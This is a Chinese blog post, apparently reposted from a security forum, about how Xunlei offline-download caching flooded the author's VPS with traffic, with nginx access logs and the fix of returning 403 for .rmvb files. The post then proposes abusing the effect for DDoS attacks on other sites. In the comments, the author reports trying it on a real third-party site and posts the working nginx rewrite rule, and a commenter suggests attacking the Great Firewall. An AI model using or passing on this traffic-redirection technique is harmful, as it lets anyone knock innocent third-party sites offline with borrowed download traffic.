利用迅雷云、百度云等等资源绑架用户,发起大型DDOS攻击

admin 8月前 197

起因

上周,某部比较出名的电影据说出了完整版非枪版,于是在某天堂找到了下载地址。但是下载地址已经失效,朋友给了个迅雷的会员号,于是就打算看看是不是枪版。把某天堂的地址拉了进去,果断找到了已经被迅雷缓存掉了。于是想用迅雷的快速播放功能,但显示源地址错误,无法快速播放。

由于博客上vps剩余流量充足,才用了不到3G/500G,于是就用vps把片子下载了,然后用迅雷的离线离线我博客的地址。

在迅雷离线的时候,查看vps的流出流量都比较稳定,基本上了离线页面显示的下载速度是相同的。

一切还好,很快就离线好了,此时vps没发现什么异常。

有点问题

用快速播放简单看了后,好吧不是枪版,比较满意,于是就开始用家里电脑下载了。

顺便还开了加速通道。。。。。

发现有点问题,一开始下载,网站马上就打不开了,一暂停,又马上恢复了。

当初以为是迅雷占满了vps 的流出,于是就没怎么管。

监控宝发来了服务器不可用的提醒,还是没管。

继续写作业了。

情况不对

写了会作业,大概过了半个多小时,目测电影已经下完了,用手机打开自己的网站,发现还是无法打开。

基本判断应该是出了什么事了,蛋疼地打开了SolusVM平台,我吓尿了。

瞬时的流出居然达到了40M/S,并且占用了我100G的流量…..


感觉到情况不太多,马上改上电脑开始处理。。。。

DDoS deflate战败

一直以来都有用DDoS deflate来防御小规模攻击的习惯

查了下iptables -L,封了的IP并不多,于是就把条件降低,但发现还是不行。

于是开始蛋疼的手动封,但发现效果还是不明显,重启了nginx依然网站无法打开。

cpu占用>85%

top了一下,多个php-fpm进程占用极高

检查特征

把日志拖了下来看看,蛋疼的由于系统时间出错,导致一开始没发现被攻击的特征。

当时时间14时左右,但是此时服务器时间才为9时

蛋疼……

直到我拖到最下面,发现了被大规模地访问视频的下载地址,后缀为rmvb

于是果断去nginx写规则把后缀为rmvb的给403掉

初见成效

ban掉*.rmvb的访问后,cpu一下子就下来了,恢复到了正常的状况。。

重启服务器后,服务器下的网站均恢复了正常访问。

蛋疼又来

上学昂上学昂……

今天回来的时候,发现尼玛突然多了4G的东西,查了一下,我跪了。

access.log这个伟大的日志文件占用的4G的空间。。。

让我情何以堪……….

改名之,重启nginx,重新生成了一个日志,拉下来一看。。。。。

部分日志

121.34.191.96 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; KB974488)"

180.110.85.117 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\xE8\x87\xB4\xE6\x88\x91\xE4\xBB\xAC\xE7\xBB\x88\xE5\xB0\x86\xE9\x80\x9D\xE5\x8E\xBB\xE7\x9A\x84\xE9\x9D\x92\xE6\x98\xA5.HD.1024x576.\xE5\x9B\xBD\xE8\xAF\xAD\xE4\xB8\xAD\xE5\xAD\x97.rmvb HTTP/1.1" 403 564 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; EIE10;ZHCNMSN)"

110.184.8.46 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\xE8\x87\xB4\xE6\x88\x91\xE4\xBB\xAC\xE7\xBB\x88\xE5\xB0\x86\xE9\x80\x9D\xE5\x8E\xBB\xE7\x9A\x84\xE9\x9D\x92\xE6\x98\xA5.HD.1024x576.\xE5\x9B\xBD\xE8\xAF\xAD\xE4\xB8\xAD\xE5\xAD\x97.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0E; BRI/2; InfoPath.2; .NET4.0C; youxihe.1437; Media Center PC 6.0; MASP; youxihe.1437)"

61.187.6.123 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\xD6\xC2\xCE\xD2\xC3\xC7\xD6\xD5\xBD\xAB\xCA\xC5\xC8\xA5\xB5\xC4\xC7\xE0\xB4\xBA.HD.1024x576.\xB9\xFA\xD3\xEF\xD6\xD0\xD7\xD6.rmvb HTTP/1.1" 404 10110 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

61.136.145.119 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

218.108.168.178 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%E8%87%B4%E6%88%91%E4%BB%AC%E7%BB%88%E5%B0%86%E9%80%9D%E5%8E%BB%E7%9A%84%E9%9D%92%E6%98%A5.HD.1024x576.%E5%9B%BD%E8%AF%AD%E4%B8%AD%E5%AD%97.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"

180.110.85.117 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; EIE10;ZHCNMSN)"

113.120.105.197 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%E8%87%B4%E6%88%91%E4%BB%AC%E7%BB%88%E5%B0%86%E9%80%9D%E5%8E%BB%E7%9A%84%E9%9D%92%E6%98%A5.HD.1024x576.%E5%9B%BD%E8%AF%AD%E4%B8%AD%E5%AD%97.rmvb HTTP/1.1" 404 10110 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

59.56.115.134 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"

61.131.97.40 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MATP; Media Center PC 6.0)"

114.83.179.112 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\xD6\xC2\xCE\xD2\xC3\xC7\xD6\xD5\xBD\xAB\xCA\xC5\xC8\xA5\xB5\xC4\xC7\xE0\xB4\xBA.HD.1024x576.\xB9\xFA\xD3\xEF\xD6\xD0\xD7\xD6.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; youxihe.1577)"

及时返回了403,但是每秒N次不同地方来的流量你也伤不起啊是不是。。。。

暂时停用了日志功能…….

删掉了那个4G的大日志…..

同样的问题,我测试过百度云离线下载也存在这种问题,我之前在网站发的Metasploit魔鬼训练营渗透测试 PDF下载 (附攻防演示环境),里面有附件加起来有12.5G都是在服务器上面,结果用百度云离线下载以后每天有N多的ip来请求下载,每天有几百G的流量流出,最后实在受不了,直接删除链接了,附件地址改为百度云地址。

写在后面

想了想为什么会有那么多不同地方的机子访问这个地址,这个地址除了我自己知道之外没有告诉过别人。

应该就是迅雷的问题了,这部电影当时比较红,可能在离线下载的时候,我这边离线到的MD5与某天堂那边电影的MD5相同,因此迅雷就把我当成了源地址之一,但用户在离线服务器提出下载请求的时候,部分下载请求就会转移到我这边。

从日志中抓了个IP去查,某某宽带,应该不会是迅雷官方服务器,而是用户机子了..

当然,上面的只是我的猜测,有什么不对的地方也敬请指出讨论讨论…

现在这个地址每秒种也有N的请求,试想一下,将这个地址rewrite到某些自己不喜欢的站点,会造成CC攻击么?

假如上面试想成立的话,即用自己的vps离线一个热门的文件后,部分下载请求访问过来,rewrite到别人的站点,岂不是造成了一个很牛X的攻击?


某星人吐槽:

1#

imlonghao (imlonghao.com 友情链接) | 2013-05-24 21:36

试了试rewrite到别人的站,秒卡.....

2#

imlonghao (imlonghao.com 友情链接) | 2013-05-24 21:39

location ~* \.(rmvb)$ {

rewrite ^/ http://www.wooyun.org/searchbug.php?q=%25;

}

3#

insight-labs (Root Yourself in Success) | 2013-05-24 21:42

迅雷会follow rewrite么?

4#

insight-labs (Root Yourself in Success) | 2013-05-24 21:44

@imlonghao

不过不得不说这个思路极其淫荡

如果会follow rewrite的话,就有资本ddos gfw了……

5#

xsser (十根阳具有长短!!) | 2013-05-24 21:51

@imlonghao 尼玛

6#

imlonghao (imlonghao.com 友情链接) | 2013-05-24 22:02

@insight-labs 等我再开多个小网站看看日志就知道了。。

7#

imlonghao (imlonghao.com 友情链接) | 2013-05-24 22:09

@xsser @insight-labs

182.149.204.207 - - [24/May/2013:22:05:49 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

219.151.158.144 - - [24/May/2013:22:05:50 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

182.149.204.207 - - [24/May/2013:22:05:50 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

113.138.50.183 - - [24/May/2013:22:05:52 +0800] "GET / HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

27.153.68.113 - - [24/May/2013:22:05:52 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

182.149.204.207 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

183.156.53.206 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

1.203.40.140 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; InfoPath.2)"

219.151.158.144 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

123.149.228.64 - - [24/May/2013:22:05:54 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

183.157.115.3 - - [24/May/2013:22:05:54 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

111.172.197.39 - - [24/May/2013:22:05:54 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

182.149.204.207 - - [24/May/2013:22:05:56 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

220.189.193.67 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; KB974487)"

183.157.115.3 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

121.237.2.43 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"

222.80.175.25 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)"

183.156.53.206 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

111.172.197.39 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

111.172.197.39 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

180.157.89.162 - - [24/May/2013:22:05:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

113.76.33.74 - - [24/May/2013:22:05:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASP)"

61.185.178.173 - - [24/May/2013:22:05:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; 4399Box.1261; 4399Box.1261)"

113.86.145.177 - - [24/May/2013:22:06:01 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 718; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

182.149.204.207 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

182.149.204.207 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

111.172.197.39 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

111.172.197.39 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

58.19.214.162 - - [24/May/2013:22:06:04 +0800] "GET / HTTP/1.1" 416 206 "-" "Mozilla/4.0"

61.153.0.130 - - [24/May/2013:22:06:04 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"

182.149.204.207 - - [24/May/2013:22:06:05 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

183.156.53.206 - - [24/May/2013:22:06:06 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

182.149.204.207 - - [24/May/2013:22:06:06 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

111.172.197.39 - - [24/May/2013:22:06:07 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

111.172.197.39 - - [24/May/2013:22:06:07 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

59.56.20.23 - - [24/May/2013:22:06:08 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

112.65.211.100 - - [24/May/2013:22:06:08 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 9.0; qdesk 2.4.1263.203; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.2)"

115.206.20.133 - - [24/May/2013:22:06:08 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB7.4)"

182.149.204.207 - - [24/May/2013:22:06:09 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

182.149.204.207 - - [24/May/2013:22:06:10 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

111.172.197.39 - - [24/May/2013:22:06:11 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

111.172.197.39 - - [24/May/2013:22:06:11 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

14.147.86.62 - - [24/May/2013:22:06:11 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; QQPinyin 685; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"

183.156.53.206 - - [24/May/2013:22:06:13 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

111.178.209.148 - - [24/May/2013:22:06:13 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"

182.149.204.207 - - [24/May/2013:22:06:14 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

183.157.115.3 - - [24/May/2013:22:06:14 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

183.17.47.78 - - [24/May/2013:22:06:14 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

58.19.214.162 - - [24/May/2013:22:06:15 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

27.188.231.155 - - [24/May/2013:22:06:16 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; MALN; .NET4.0E; Zune 4.7; InfoPath.1)"

111.172.197.39 - - [24/May/2013:22:06:16 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

58.48.1.93 - - [24/May/2013:22:06:17 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

222.69.92.85 - - [24/May/2013:22:06:17 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"

61.153.149.166 - - [24/May/2013:22:06:17 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Apache; .NET CLR 2.0.50727)"

58.48.106.206 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; KB974488)"

113.65.198.144 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

182.149.204.207 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

114.233.127.15 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"

61.145.38.137 - - [24/May/2013:22:06:22 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"

117.65.195.17 - - [24/May/2013:22:06:22 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

101.85.201.140 - - [24/May/2013:22:06:22 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

182.149.204.207 - - [24/May/2013:22:06:23 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

111.172.197.39 - - [24/May/2013:22:06:24 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

222.70.224.156 - - [24/May/2013:22:06:24 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; MATP)"

116.11.198.33 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;  Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

183.156.9.151 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)"

116.11.198.33 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;  Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

116.11.198.33 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;  Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

116.11.198.33 - - [24/May/2013:22:06:26 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;  Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

1.194.117.98 - - [24/May/2013:22:06:26 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

116.11.198.33 - - [24/May/2013:22:06:26 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;  Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

116.11.198.33 - - [24/May/2013:22:06:27 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;  Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

117.88.225.78 - - [24/May/2013:22:06:27 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; KB974488)"

218.89.59.42 - - [24/May/2013:22:06:27 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; BOIE9;ZHCN)"

116.11.198.33 - - [24/May/2013:22:06:27 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;  Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

111.172.197.39 - - [24/May/2013:22:06:28 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

183.9.16.122 - - [24/May/2013:22:06:28 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; BRI/2)"

58.19.214.162 - - [24/May/2013:22:06:29 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

